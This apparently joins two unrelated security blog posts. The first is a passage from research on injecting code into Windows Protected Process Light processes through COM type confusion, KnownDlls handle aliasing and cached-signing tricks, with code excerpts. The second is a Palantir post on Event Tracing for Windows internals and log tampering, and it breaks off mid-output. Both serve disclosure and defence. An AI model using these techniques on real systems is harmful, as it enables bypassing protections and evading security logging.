if(RtlEqualUnicodeString(g_BlockedDllsForPPL[i],
&OriginalImageName, TRUE)){
return STATUS_DYNAMIC_CODE_BLOCKED;
}
}
return STATUS_SUCCESS;
}The fix checks the original file name in the resource section of the image being loaded against a blacklist of 5 DLLs. The blacklist includes DLLs such as JSCRIPT.DLL, which implements the original JScript scripting engine, and SCROBJ.DLL, which implements scriptlet objects. If the kernel detects a PP or PPL loading one of these DLLs the image load is rejected with STATUS_DYNAMIC_CODE_BLOCKED. This kills my exploit, if you modify the resource section of one of the listed DLLs the signature of the image will be invalidated resulting in the image load failing due to a cryptographic hash mismatch. It’s actually the same fix that Oracle used to block the attack in VirtualBox, although that was implemented in user-mode.

Finding New Targets

The previous injection technique using script code was a generic technique that worked on any PPL which loaded a COM object. With the technique fixed I decided to go back and look at what executables will load as a PPL to see if they have any obvious vulnerabilities I could exploit to get arbitrary code execution. I could have chosen to go after a full PP, but PPL seemed the easier of the two and I’ve got to start somewhere. There’s so many ways to inject into a PPL if we could just get administrator privileges, the least of which is just loading a kernel driver. For that reason any vulnerability I discover must work from a normal user account. Also I wanted to get the highest signing level I can get, which means PPL at Windows TCB signing level.The first step was to identify executables which run as a protected process, this gives us the maximum attack surface to analyze for vulnerabilities. Based on the blog posts from Alex it seemed that in order to be loaded as PP or PPL the signing certificate needs a special Object Identifier (OID) in the certificate’s Enhanced Key Usage (EKU) extension. There are separate OID for PP and PPL; we can see this below with a comparison between WERFAULTSECURE.EXE, which can run as PP/PPL, and CSRSS.EXE, which can only run as PPL.

I decided to look for executables which have an embedded signature with these EKU OIDs and that’ll give me a list of all executables to look for exploitable behavior. I wrote the Get-EmbeddedAuthenticodeSignaturecmdlet for my NtObjectManager PowerShell module to extract this information.At this point I realized there was a problem with the approach of relying on the signing certificate, there’s a lot of binaries I expected to be allowed to run as PP or PPL which were missing from the list I generated. As PP was originally designed for DRM there was no obvious executable to handle the Protected Media Pathsuch as AUDIODG.EXE. Also, based on my previous research into Device Guard and Windows 10S, I knew there must be an executable in the .NET framework which could run as PPL to add cached signing level information to NGEN generated binaries (NGEN is an Ahead-of-Time JIT to convert a .NET assembly into native code). The criteria for PP/PPL were more fluid than I expected. Instead of doing static analysis I decided to perform dynamic analysis, just start protected every executable I could enumerate and query the protection level granted. I wrote the following script to test a single executable:Import-Module NtObjectManagerfunction Test-ProtectedProcess {[CmdletBinding()]   param([Parameter(Mandatory, ValueFromPipelineByPropertyName)][string]$FullName,[NtApiDotNet.PsProtectedType]$ProtectedType= 0,[NtApiDotNet.PsProtectedSigner]$ProtectedSigner= 0       )   BEGIN {$config= New-NtProcessConfig abc ProcessFlags ProtectedProcess `           ThreadFlags Suspended TerminateOnDispose `           ProtectedType $ProtectedType `           ProtectedSigner $ProtectedSigner}   PROCESS {$path= Get-NtFilePath $FullName       Write-Host $path       try {           Use-NtObject($p= New-NtProcess $pathConfig $config){$prot=$p.Process.Protection               $props= @{                   Path=$path;                   Type=$prot.Type;                   Signer=$prot.Signer;                   Level=$prot.Level.ToString(«X»);}$obj= New-Object –TypeName PSObject –Prop $props               Write-Output $obj}} catch {}}}When this script is executed a function is defined, Test-ProtectedProcess. The function takes a path to an executable, starts that executable with a specified protection level and checks whether it was successful. If the ProtectedType and ProtectedSigner parameters are 0 then the kernel decides the “best” process level. This leads to some annoying quirks, for example SVCHOST.EXE is explicitly marked as PPL and will run at PPL-Windows level, however as it’s also a signed OS component the kernel will determine its maximum level is PP-Authenticode. Another interesting quirk is using the native process creation APIs it’s possible to start a DLL as main executable image. As a significant number of system DLLs have embedded Microsoft signatures they can also be started as PP-Authenticode, even though this isn’t necessarily that useful. The list of binaries that will run at PPL is shown below along with their maximum signing level.

PathSigning Level
C:\windows\Microsoft.Net\Framework\v4.0.30319\mscorsvw.exeCodeGen
C:\windows\Microsoft.Net\Framework64\v4.0.30319\mscorsvw.exeCodeGen
C:\windows\system32\SecurityHealthService.exeWindows
C:\windows\system32\svchost.exeWindows
C:\windows\system32\xbgmsvc.exeWindows
C:\windows\system32\csrss.exeWindows TCB
C:\windows\system32\services.exeWindows TCB
C:\windows\system32\smss.exeWindows TCB
C:\windows\system32\werfaultsecure.exeWindows TCB
C:\windows\system32\wininit.exeWindows TCB

Injecting Arbitrary Code Into NGEN

After carefully reviewing the list of executables which run as PPL I settled ontrying to attack the previously mentioned .NET NGEN binary, MSCORSVW.EXE. My rationale for choosing the NGEN binary was:

  • Most of the other binaries are service binaries which might need administrator privileges to start correctly.
  • The binary is likely to be loading complex functionality such as the .NET framework as well as having multiple COM interactions (my go-to technology for weird behavior).
  • In the worst case it might still yield a Device Guard bypass as the reason it runs as PPL is to give it access to the kernel APIs to apply a cached signing level. Any bug in the operation of this binary might be exploitable even if we can’t get arbitrary code running in a PPL.

But there is an issue with the NGEN binary, specifically it doesn’t meet my own criteria that I get the top signing level, Windows TCB. However, I knew that when Microsoft fixed Issue 1332 they left in a back door where a writable handle could be maintained during the signing process if the calling process is PPL as shown below:NTSTATUS CiSetFileCache(HANDLE Handle,…){

 PFILE_OBJECT FileObject;
 ObReferenceObjectByHandle(Handle,&FileObject);

if(FileObject->SharedWrite ||
(FileObject->WriteAccess &&
     PsGetProcessProtection().Type != PROTECTED_LIGHT)){
return STATUS_SHARING_VIOLATION;
}

 // Continue setting file cache.
}If I could get code execution inside the NGEN binary I could reuse this backdoor to cache sign an arbitrary file which will load into any PPL. I could then DLL hijack a full PPL-WindowsTCB process to reach my goal.To begin the investigation we need to determine how to use the MSCORSVW executable. Using MSCORSVW is not documented anywhere by Microsoft, so we’ll have to do a bit of digging. First off, this binary is not supposed to be run directly, instead it’s invoked by NGEN when creating an NGEN’ed binary. Therefore, we can run the NGEN binary and use a tool such as Process Monitor to capture what command line is being used for the MSCORSVW process. Executing the command:C:\> NGEN install c:\some\binary.dllResults in the following command line being executed:MSCORSVW -StartupEvent A -InterruptEvent B -NGENProcess C -Pipe DA, B, C and D are handles which NGEN ensures are inherited into the new process before it starts. As we don’t see any of the original NGEN command line parameters it seems likely they’re being passed over an IPC mechanism. The “Pipe” parameter gives an indication that  named pipes are used for IPC. Digging into the code in MSCORSVW, we find the method NGenWorkerEmbedding, which looks like the following:void NGenWorkerEmbedding(HANDLE hPipe){
 CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED);
 CorSvcBindToWorkerClassFactory factory;

 // Marshal class factory.
 IStream* pStm;
 CreateStreamOnHGlobal(nullptr, TRUE,&pStm);
 CoMarshalInterface(pStm,&IID_IClassFactory, &factory,                    MSHCTX_LOCAL,nullptr, MSHLFLAGS_NORMAL);

 // Read marshaled object and write to pipe.
 DWORD length;
 char* buffer = ReadEntireIStream(pStm,&length);
 WriteFile(hPipe,&length,sizeof(length));
 WriteFile(hPipe, buffer, length);
 CloseHandle(hPipe);

 // Set event to synchronize with parent.
 SetEvent(hStartupEvent);

 // Pump message loop to handle COM calls.
 MessageLoop();

 // …
}This code is not quite what I expected. Rather than using the named pipe for the entire communication channel it’s only used to transfer a marshaled COM object back to the calling process. The COM object is a class factory instance, normally you’d register the factory using CoRegisterClassObject but that would make it accessible to all processes at the same security level so instead by using marshaling the connection can be left private only to the NGEN binary which spawned MSCORSVW. A .NET related process using COM gets me interested as I’ve previously described in another blog post how you can exploit COM objects implemented in .NET. If we’re lucky this COM object is implemented in .NET, we can determine if it is implemented in .NET by querying for its interfaces, for example we use the Get-ComInterface command in my OleViewDotNet PowerShell module as shown in the following screenshot.

We’re out of luck, this object is not implemented in .NET, as you’d at least expect to see an instance of the_Object interface. There’s only one interface implemented, ICorSvcBindToWorker so let’s dig into that interface to see if there’s anything we can exploit.Something caught my eye, in the screenshot there’s a HasTypeLib column, for ICorSvcBindToWorker we see that the column is set to True. What HasTypeLib indicates is rather than the interface’s proxy code being implemented using an predefined NDR byte stream it’s generated on the fly from a type library. I’ve abused this auto-generating proxy mechanism before to elevate to SYSTEM, reported as issue 1112. In the issue I used some interesting behavior of the system’s Running Object Table (ROT) to force a type confusion in a system COM service. While Microsoft has fixed the issue for User to SYSTEM there’s nothing stopping us using the type confusion trick to exploit the MSCORSVW process running as PPL at the same privilege level and get arbitrary code execution. Another advantage of using a type library is a normal proxy would be loaded as a DLL which means that it must meet the PPL signing level requirements; however a type library is just data so can be loaded into a PPL without any signing level violations.How does the type confusion work? Looking at the ICorSvcBindToWorker interface from the type library:interface ICorSvcBindToWorker : IUnknown {
   HRESULT BindToRuntimeWorker(
[in] BSTR pRuntimeVersion,
[in] unsigned long ParentProcessID,
[in] BSTR pInterruptEventName,
[in] ICorSvcLogger* pCorSvcLogger,
[out] ICorSvcWorker** pCorSvcWorker);
};The single BindToRuntimeWorker takes 5 parameters, 4 are inbound and 1 is outbound. When trying to access the method over DCOM from our untrusted process the system will automatically generate the proxy and stub for the call. This will include marshaling COM interface parameters into a buffer, sending the buffer to the remote process and then unmarshaling to a pointer before calling the real function. For example imagine a simpler function, DoSomething which takes a single IUnknown pointer. The marshaling process looks like the following:

The operation of the method call is as follow:

  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an IUnknown pointer parameter.
  2. DoSomethingProxy marshals the IUnknown pointer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the interface pointer from the buffer. Note that this pointer is not the original pointer from step 1, it’s likely to be a new proxy which calls back to the untrusted process.
  4. The stub invokes the real implemented method inside the server, passing the unmarshaled interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable.

How would we exploit this? All we need to do is modify the type library so that instead of passing an interface pointer we pass almost anything else. While the type library file is in a system location which we can’t modify we can just replace the registration for it in the current user’s registry hive, or use the same ROT trick from before issue 1112. For example if we modifying the type library to pass an integer instead of an interface pointer we get the following:

The operation of the marshal now changes as follows:

  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an arbitrary integer parameter.
  2. DoSomethingProxy marshals the integer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the integer from the buffer.
  4. The stub invokes the real implement method inside the server, passing the integer as the parameter. However DoSomething hasn’t changed, it’s still the same method which accepts an interface pointer. As the COM runtime has no more type information at this point the integer is type confused with the interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable. As this pointer is completely under control of the untrusted process this likely results in arbitrary code execution.

By changing the type of parameter from an interface pointer to an integer we induce a type confusion which allows us to get an arbitrary pointer dereferenced, resulting in arbitrary code execution. We could even simplify the attack by adding to the type library the following structure:struct FakeObject {
   BSTR FakeVTable;
};If we pass a pointer to a FakeObject instead of the interface pointer the auto-generated proxy will marshal the structure and its BSTR, recreating it on the other side in the stub. As a BSTR is a counted string it can contain NULLs so this will create a pointer to an object, which contains a pointer to an arbitrary byte array which can act as a VTable. Place known function pointers in that BSTR and you can easily redirect execution without having to guess the location of a suitable VTable buffer.To fully exploit this we’d need to call a suitable method, probably running a ROP chain and we might also have to bypass CFG. That all sounds too much like hard work, so instead I’ll take a different approach to get arbitrary code running in the PPL binary, by abusing KnownDlls.

KnownDlls and Protected Processes.

In my previous blog post I described a technique to elevate privileges from an arbitrary object directory creation vulnerability to SYSTEM by adding an entry into the KnownDlls directory and getting an arbitrary DLL loaded into a privileged process. I noted that this was also an administrator to PPL code injection as PPL will also load DLLs from the system’s KnownDlls location. As the code signing check is performed during section creation not section mapping as long as you can place an entry into KnownDlls you can load anything into a PPL even unsigned code.This doesn’t immediately seem that useful, we can’t write to KnownDlls without being an administrator, and even then without some clever tricks. However it’s worth looking at how a Known DLL is loaded to get an understanding on how it can be abused. Inside NTDLL’s loader (LDR) code is the following function to determine if there’s a preexisting Known DLL.NTSTATUS LdrpFindKnownDll(PUNICODE_STRING DllName, HANDLE *SectionHandle){
 // If KnownDll directory handle not open then return error.
if(!LdrpKnownDllDirectoryHandle)
return STATUS_DLL_NOT_FOUND;

 OBJECT_ATTRIBUTES ObjectAttributes;
 InitializeObjectAttributes(&ObjectAttributes,
&DllName,
   OBJ_CASE_INSENSITIVE,
   LdrpKnownDllDirectoryHandle,
nullptr);

return NtOpenSection(SectionHandle,
                      SECTION_ALL_ACCESS,
&ObjectAttributes);
}The LdrpFindKnownDll function calls NtOpenSection to open the named section object for the Known DLL. It doesn’t open an absolute path, instead it uses the feature of the native system calls to specify a root directory for the object name lookup in the OBJECT_ATTRIBUTES structure. This root directory comes from the global variable LdrpKnownDllDirectoryHandle. Implementing the call this way allows the loader to only specify the filename (e.g. EXAMPLE.DLL) and not have to reconstruct the absolute path as the lookup with be relative to an existing directory. Chasing references to LdrpKnownDllDirectoryHandle we can find it’s initialized in LdrpInitializeProcess as follows:NTSTATUS LdrpInitializeProcess(){
 // …
 PPEB peb = // …
 // If a full protected process don’t use KnownDlls.
if(peb->IsProtectedProcess &&!peb->IsProtectedProcessLight){
   LdrpKnownDllDirectoryHandle =nullptr;
}else{
   OBJECT_ATTRIBUTES ObjectAttributes;
   UNICODE_STRING DirName;
   RtlInitUnicodeString(&DirName, L»\\KnownDlls»);
   InitializeObjectAttributes(&ObjectAttributes,
&DirName,
                              OBJ_CASE_INSENSITIVE,
nullptr,nullptr);
   // Open KnownDlls directory.
   NtOpenDirectoryObject(&LdrpKnownDllDirectoryHandle,
                         DIRECTORY_QUERY | DIRECTORY_TRAVERSE,
&ObjectAttributes);
}This code shouldn’t be that unexpected, the implementation calls NtOpenDirectoryObject, passing the absolute path to the KnownDlls directory as the object name. The opened handle is stored in theLdrpKnownDllDirectoryHandle global variable for later use. It’s worth noting that this code checks the PEB to determine if the current process is a full protected process. Support for loading Known DLLs is disabled in full protected process mode, which is why even with administrator privileges and the clever trick I outlined in the last blog post we could only compromise PPL, not PP.How does this knowledge help us? We can use our COM type confusion trick to write values into arbitrary memory locations instead of trying to hijack code execution resulting in a data only attack. As we can inherit any handles we like into the new PPL process we can setup an object directory with a named section, then use the type confusion to change the value of LdrpKnownDllDirectoryHandle to the value of the inherited handle. If we induce a DLL load from System32 with a known name the LDR will check our fake directory for the named section and map our unsigned code into memory, even calling DllMain for us. No need for injecting threads, ROP or bypassing CFG.All we need is a suitable primitive to write an arbitrary value, unfortunately while I could find methods which would cause an arbitrary write I couldn’t sufficiently control the value being written. In the end I used the following interface and method which was implemented on the object returned byICorSvcBindToWorker::BindToRuntimeWorker.interface ICorSvcPooledWorker : IUnknown {
   HRESULT CanReuseProcess(
[in] OptimizationScenario scenario,
[in] ICorSvcLogger* pCorSvcLogger,
[out] long* pCanContinue);
};
In the implementation of CanReuseProcess the target value of pCanContinue is always initialized to 0. Therefore by replacing the [out] long* in the type library definition with [in] long we can get 0 written to any memory location we specify. By prefilling the lower 16 bits of the new process’ handle table with handles to a fake KnownDlls directory we can be sure of an alias between the real KnownDlls which will be opened once the process starts and our fake ones by just modifying the top 16 bits of the handle to 0. This is shown in the following diagram:

Once we’ve overwritten the top 16 bits with 0 (the write is 32 bits but handles are 64 bits in 64 bit mode, so we won’t overwrite anything important) LdrpKnownDllDirectoryHandle now points to one of our fakeKnownDlls handles. We can then easily induce a DLL load by sending a custom marshaled object to the same method and we’ll get arbitrary code execution inside the PPL.

Elevating to PPL-Windows TCB

We can’t stop here, attacking MSCORSVW only gets us PPL at the CodeGen signing level, not Windows TCB. Knowing that generating a fake cached signed DLL should run in a PPL as well as Microsoft leaving a backdoor for PPL processes at any signing level I converted my C# code from Issue 1332 to C++ to generate a fake cached signed DLL. By abusing a DLL hijack in WERFAULTSECURE.EXE which will run as PPL Windows TCB we should get code execution at the desired signing level. This worked on Windows 10 1709 and earlier, however it didn’t work on 1803. Clearly Microsoft had changed the behavior of cached signing level in some way, perhaps they’d removed its trust in PPL entirely. That seemed unlikely as it would have a negative performance impact.After discussing this a bit with Alex Ionescu I decided to put together a quick parser with information from Alex for the cached signing data on a file. This is exposed in NtObjectManager as the Get-NtCachedSigningLevel command. I ran this command against a fake signed binary and a system binary which was also cached signed and immediately noticed a difference:

For the fake signed file the Flags are set to TrustedSignature (0x02), however for the system binary PowerShell couldn’t decode the enumeration and so just outputs the integer value of 66 which is 0x42 in hex. The value 0x40 was an extra flag on top of the original trusted signature flag. It seemed likely that without this flag set the DLL wouldn’t be loaded into a PPL process. Something must be setting this flag so I decided to check what happened if I loaded a valid cached signed DLL without the extra flag into a PPL process. Monitoring it in Process Monitor I got my answer:

The Process Monitor trace shows that first the kernel queries for the Extended Attributes (EA) from the DLL. The cached signing level data is stored in the file’s EA so this is almost certainly an indication of the cached signing level being read. In the full trace artifacts of checking the full signature are shown such as enumerating catalog files, I’ve removed those artifacts from the screenshot for brevity. Finally the EA is set, if I check the cached signing level of the file it now includes the extra flag. So setting the cached signing level is done automatically, the question is how? By pulling up the stack trace we can see how it happens:

Looking at the middle of the stack trace we can see the call to CipSetFileCache originates from the call toNtCreateSection. The kernel is automatically caching the signature when it makes sense to do so, e.g. in a PPL so that subsequent image mapping don’t need to recheck the signature. It’s possible to map an image section from a file with write access so we can reuse the same attack from Issue 1332 and replace the call toNtSetCachedSigningLevel with NtCreateSection and we can fake sign any DLL. It turned out that the call to set the file cache happened after the write check introducted to fix Issue 1332 and so it was possible to use this to bypass Device Guard again. For that reason I reported the bypass as Issue 1597 which was fixed in September 2018 as CVE-2018-8449. However, as with Issue 1332 the back door for PPL is still in place so even though the fix eliminated the Device Guard bypass it can still be used to get us from PPL-CodeGen to PPL-WindowsTCB.

Conclusions

This blog showed how I was able to inject arbitrary code into a PPL without requiring administrator privileges. What could you do with this new found power? Actually not a great deal as a normal user but there are some parts of the OS, such as the Windows Store which rely on PPL to secure files and resources which you can’t modify as a normal user. If you elevate to administrator and then inject into a PPL you’ll get many more things to attack such as CSRSS (through which you can certainly get kernel code execution) or attack Windows Defender which runs as PPL Anti-Malware. Over time I’m sure the majority of the use cases for PPL will be replaced with Virtual Secure Mode (VSM) and Isolated User Mode (IUM) applications which have greater security guarantees and are also considered security boundaries that Microsoft will defend and fix.Did I report these issues to Microsoft? Microsoft has made it clear that they will not fix issues only affecting PP and PPL in a security bulletin. Without a security bulletin the researcher receives no acknowledgement for the find, such as a CVE. The issue will not be fixed in current versions of Windows although it might be fixed in the next major version. Previously confirming Microsoft’s policy on fixing a particular security issue was based on precedent, however they’ve recently published a list of Windows technologies that will or will not be fixed in the Windows Security Service Criteria which, as shown below for Protected Process Light, Microsoft will not fix or pay a bounty for issues relating to the feature. Therefore, from now on I will not be engaging Microsoft if I discover issues which I believe to only affect PP or PPL.

The one bug I reported to Microsoft was only fixed because it could be used to bypass Device Guard. When you think about it, only fixing for Device Guard is somewhat odd. I can still bypass Device Guard by injecting into a PPL and setting a cached signing level, and yet Microsoft won’t fix PPL issues but will fix Device Guard issues. Much as the Windows Security Service Criteria document really helps to clarify what Microsoft will and won’t fix it’s still somewhat arbitrary. A secure feature is rarely secure in isolation, the feature is almost certainly secure because other features enable it to be so.
In part 2 of this blog we’ll go into how I was also able to break into Full PP-WindowsTCB processes using another interesting feature of COM.

Tampering with Windows Event Tracing: Background, Offense, and Defense

( Original text by Palantir )

Event Tracing for Windows (ETW) is the mechanism Windows uses to trace and log system events. Attackers often clear event logs to cover their tracks. Though the act of clearing an event log itself generates an event, attackers who know ETW well may take advantage of tampering opportunities to cease the flow of logging temporarily or even permanently, without generating any event log entries in the process.

The Windows event log is the data source for many of the Palantir Critical Incident Response Team’s Alerting and Detection Strategies, so familiarity with event log tampering tradecraft is foundational to our success. We continually evaluate our assumptions regarding the integrity of our event data sources, document our blind spots, and adjust our implementation. The goal of this blog post is to share our knowledge with the community by covering ETW background and basics, stealthy event log tampering techniques, and detection strategies.

Introduction to ETW and event logging

The ETW architecture differentiates between event providers, event consumers, and event tracing sessions. Tracing sessions are responsible for collecting events from providers and for relaying them to log files and consumers. Sessions are created and configured by controllers like the built-in 

logman.exe
 command line utility. Here are some useful commands for exploring existing trace sessions and their respective ETW providers; note that these must usually be executed from an elevated context.

List all running trace sessions

>

logman query -ets
Data Collector Set                Type    Status
-------------------------------------------------
Circular Kernel Context Logger Trace Running
AppModel Trace Running
ScreenOnPowerStudyTraceSession Trace Running
DiagLog Trace Running
EventLog-Application Trace Running
EventLog-System Trace Running
LwtNetLog Trace Running
NtfsLog Trace Running
TileStore Trace Running
UBPM Trace Running
WdiContextLog Trace Running
WiFiSession Trace Running
UserNotPresentTraceSession Trace Running
Diagtrack-Listener Trace Running
MSDTC_TRACE_SESSION Trace Running
WindowsUpdate_trace_log Trace Running

List all providers that a trace session is subscribed to

>

logman query "EventLog-Application" -ets
Name:                 EventLog-Application
Status: Running
Root Path: %systemdrive%\PerfLogs\Admin
Segment: Off
Schedules: On
Segment Max Size: 100 MB

Name: EventLog-Application\EventLog-Application
Type: Trace
Append: Off
Circular: Off
Overwrite: Off
Buffer Size: 64
Buffers Lost: 0
Buffers Written: 242
Buffer Flush Timer: 1
Clock Type: System
File Mode: Real-time

Provider:
Name: Microsoft-Windows-SenseIR
Provider Guid: {B6D775EF-1436-4FE6-BAD3-9E436319E218}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x8000000000000000 (Microsoft-Windows-SenseIR/Operational)
Properties: 65
Filter Type: 0

Provider:
Name: Microsoft-Windows-WDAG-Service
Provider Guid: {728B02D9-BF21-49F6-BE3F-91BC06F7467E}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x8000000000000000
Properties: 65
Filter Type: 0

...

Provider:
Name: Microsoft-Windows-PowerShell
Provider Guid: {A0C1853B-5C40-4B15-8766-3CF1C58F985A}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x9000000000000000 (Microsoft-Windows-PowerShell/Operational,Microsoft-Windows-PowerShell/Admin)
Properties: 65
Filter Type: 0

This command details the configuration of the trace session itself, followed by the configuration of each provider that the session is subscribed to, including the following parameters:

  • Name: The name of the provider. A provider only has a name if it has a registered manifest, but it always has a unique GUID.
  • Provider GUID: The unique GUID for the provider. The GUID and/or name of a provider is useful when performing research or operations on a specific provider.
  • Level: The logging level specified. Standard logging levels are: 0 — Log Always; 1 — Critical; 2 — Error; 3 — Warning; 4 — Informational; 5 — Verbose. Custom logging levels can also be defined, but levels 6–15 are reserved. More than one logging level can be captured by ORing respective levels; supplying 255 (0xFF) is the standard method of capturing all supported logging levels.
  • KeywordsAll: Keywords are used to filter specific categories of events. While logging level is used to filter by event verbosity/importance, keywords allow filtering by event category. A keyword corresponds to a specific bit value. All indicates that, for a given keyword matched by 
    KeywordsAny
    , further filtering should be performed based on the specific bitmask in 
    KeywordsAll
    . This field is often set to zero. More information on All vs. Any can be found here.
  • KeywordsAny: Enables filtering based on any combination of the keywords specified. This can be thought of as a logical OR where KeywordsAll is a subsequent application of a logical AND. The low 6 bytes refer to keywords specific to the provider. The high two bytes are reserved and defined in 
    WinMeta.xml
     in the Windows SDK. For example, in event log-related trace sessions, you will see the high byte (specifically, the high nibble) set to a specific value. This corresponds to one or more event channels where the following channels are defined:
0x01 - Admin channel
0x02 - Debug channel
0x04 - Analytic channel
0x08 - Operational channel
  • Properties: This refers to optional ETW properties that can be specified when writing the event. The following values are currently supported (more information here):
0x001 - EVENT_ENABLE_PROPERTY_SID
0x002 - EVENT_ENABLE_PROPERTY_TS_ID
0x004 - EVENT_ENABLE_PROPERTY_STACK_TRACE
0x008 - EVENT_ENABLE_PROPERTY_PSM_KEY
0x010 - EVENT_ENABLE_PROPERTY_IGNORE_KEYWORD_0
0x020 - EVENT_ENABLE_PROPERTY_PROVIDER_GROUP
0x040 - EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0
0x080 - EVENT_ENABLE_PROPERTY_PROCESS_START_KEY
0x100 - EVENT_ENABLE_PROPERTY_EVENT_KEY
0x200 - EVENT_ENABLE_PROPERTY_EXCLUDE_INPRIVATE

From a detection perspective, EVENT_ENABLE_PROPERTY_SID, EVENT_ENABLE_PROPERTY_TS_ID, EVENT_ENABLE_PROPERTY_PROCESS_START_KEY are valuable fields to collect. For example, EVENT_ENABLE_PROPERTY_PROCESS_START_KEY generates a value that uniquely identifies a process. Note that Process IDs are not unique identifiers for a process instance.

  • Filter Type: Providers can optionally choose to implement additional filtering; supported filters are defined in the provider manifest. In practice, none of the built-in providers implement filters as confirmed by running TdhEnumerateProviderFilters over all registered providers. There are some predefined filter types defined in 
    eventprov.h
     (in the Windows SDK):
0x00000000 - EVENT_FILTER_TYPE_NONE
0x80000000 - EVENT_FILTER_TYPE_SCHEMATIZED
0x80000001 - EVENT_FILTER_TYPE_SYSTEM_FLAGS
0x80000002 - EVENT_FILTER_TYPE_TRACEHANDLE
0x80000004 - EVENT_FILTER_TYPE_PID
0x80000008 - EVENT_FILTER_TYPE_EXECUTABLE_NAME
0x80000010 - EVENT_FILTER_TYPE_PACKAGE_ID
0x80000020 - EVENT_FILTER_TYPE_PACKAGE_APP_ID
0x80000100 - EVENT_FILTER_TYPE_PAYLOAD
0x80000200 - EVENT_FILTER_TYPE_EVENT_ID
0x80000400 - EVENT_FILTER_TYPE_EVENT_NAME
0x80001000 - EVENT_FILTER_TYPE_STACKWALK
0x80002000 - EVENT_FILTER_TYPE_STACKWALK_NAME
0x80004000 - EVENT_FILTER_TYPE_STACKWALK_LEVEL_KW

Enumerating all registered ETW providers

The 

logman query providers&nbsp;
command lists all registered ETW providers, supplying their name and GUID. An ETW provider is registered if it has a binary manifest stored in the
 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{PROVIDER_GUID}
 registry key. For example, the 
Microsoft-Windows-PowerShell
 provider has the following registry values:

ETW and the event log know how to properly parse and display event information to a user based on binary-serialized information in the 

WEVT_TEMPLATE
 resource present in the binaries listed in the 
ResourceFileName
 registry value. This resource is a binary representation of an instrumentation manifest (i.e., the schema for an ETW provider). The binary structure of 
WEVT_TEMPLATE
 is under-documented, but there are at least two tools available to assist in parsing and recovering event schema, WEPExplorer and Perfview.

Viewing an individual provider

The 

logman
 tool prints basic information about a provider. For example:

The listings shows supported keywords and logging values, as well as all processes that are registered to emit events via this provider. This output is useful for understanding how existing trace sessions filter on providers. It is also useful for initial discovery of potentially interesting information that could be gathered from via an ETW trace.

Notably, the PowerShell provider appears to support logging to the event log based on the existence of the reserved keywords in the high nibble of the defined keywords. Not all ETW providers are designed to be ingested into the event log; rather, many ETW providers are intended to be used solely for low-level tracing, debugging, and more recently-developed security telemetry purposes. For example, Windows Defender Advanced Threat Protection relies heavily upon ETW as a supplemental detection data source.

Viewing all providers that a specific process is sending events to

Another method for discovering potentially interesting providers is to view all providers to which events are written from a specific process. For example, the following listing shows all providers relevant to 

MsMpEng.exe
 (the Windows Defender service, running as pid 5244 in this example):

Entries listed with GUID are providers lacking a manifest. They will typically be related to WPP or TraceLogging, both of which are beyond the scope of this blog post. It is possible to retrieve provider names and event metadata for these providers types. For example, here are some of the resolved provider names from the unnamed providers above:

  • 05F95EFE-7F75–49C7-A994–60A55CC09571
    Microsoft.Windows.Kernel.KernelBase
  • 072665FB-8953–5A85–931D-D06AEAB3D109
    Microsoft.Windows.ProcessLifetimeManage
  • 7AF898D7–7E0E-518D-5F96-B1E79239484C
    Microsoft.Windows.Defender

Event provider internals

Looking at ETW-replated code snippets in built-in Windows binaries can help you understand how ETW events are constructed and how they surface in event logs. Below, we highlight two code samples, 

System.Management.Automation.dll
 (the core PowerShell assembly) and 
amsi.dll
.

System.Management.Automation.dll event tracing

One of the great security features of PowerShell version 5 is scriptblock autologging; when enabled, script content is automatically logged to the Microsoft-Windows-PowerShell/Operational event log with event ID 4104 (warning level) if the scriptblock contains any suspicious terms. The following C# code is executed to generate the event log:

From PowerShell

The 

LogOperationalWarning
 method is implemented as follows:

From PowerShell

The 

WriteEvent
 method is implemented as follows:

From PowerShell

Finally, the event information is marshaled and EventWriteTransfer is called, supplying the Microsoft-Windows-PowerShell provider with event data.

The relevant data supplied to 

EventWriteTransfer
 is as follows:

  • Microsoft-Windows-PowerShell provider GUID: 
    {A0C1853B-5C40-4b15-8766-3CF1C58F985A}
  • Event ID: 
    PSEventId.ScriptBlock_Compile_Detail - 4104
  • Channel value: 
    PSChannel.Operational - 16<br>
    Again, the usage of a channel value indicates that the provider is intended to be used with the event log. The operational channel definition for the PowerShell ETW manifest can be seen here. When an explicit channel value is not supplied, Message Compiler (
    mc.exe
    ) will assign a default value starting at 16. Since the operational channel was defined first, it was assigned 16.
  • Opcode value: 
    PSOpcode.Create - 15
  • Logging level: 
    PSLevel.Warning - 3
  • Task value: 
    PSTask.CommandStart - 102
  • Keyword value: 
    PSKeyword.UseAlwaysAnalytic - 0x4000000000000000<br>
    This value is later translated to 0 as seen in the code block above. Normally, this event would not be logged but because the Application event log trace session specifies the 
    EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 Enable
     flag for all of its providers which will log the event despite a keyword value not being specified.
  • Event data: the scriptblock contents and event fields

Upon receiving the event from the PowerShell ETW provider, the event log service parses the binary 

WEVT_TEMPLATE
 schema (original XML schema) and presents human-readable, parsed event properties/fields:

amsi.dll event tracing

You may have observed that Windows 10 has an AMSI/Operational event log that is typically empty. To understand why events are not logged to this event log, you would first have to inspect how data is fed to the AMSI ETW provider (

Microsoft-Antimalware-Scan-Interface - {2A576B87-09A7-520E-C21A-4942F0271D67}
) and then observe how the Application event log trace session (
EventLog-Application
) subscribes to the AMSI ETW provider. Let’s start by looking at the provider registration in the Application event log. The following PowerShell cmdlet will supply us with this information:

>

Get-EtwTraceProvider -SessionName EventLog-Application -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}'
SessionName     : EventLog-Application
Guid : {2A576B87-09A7-520E-C21A-4942F0271D67}
Level : 255
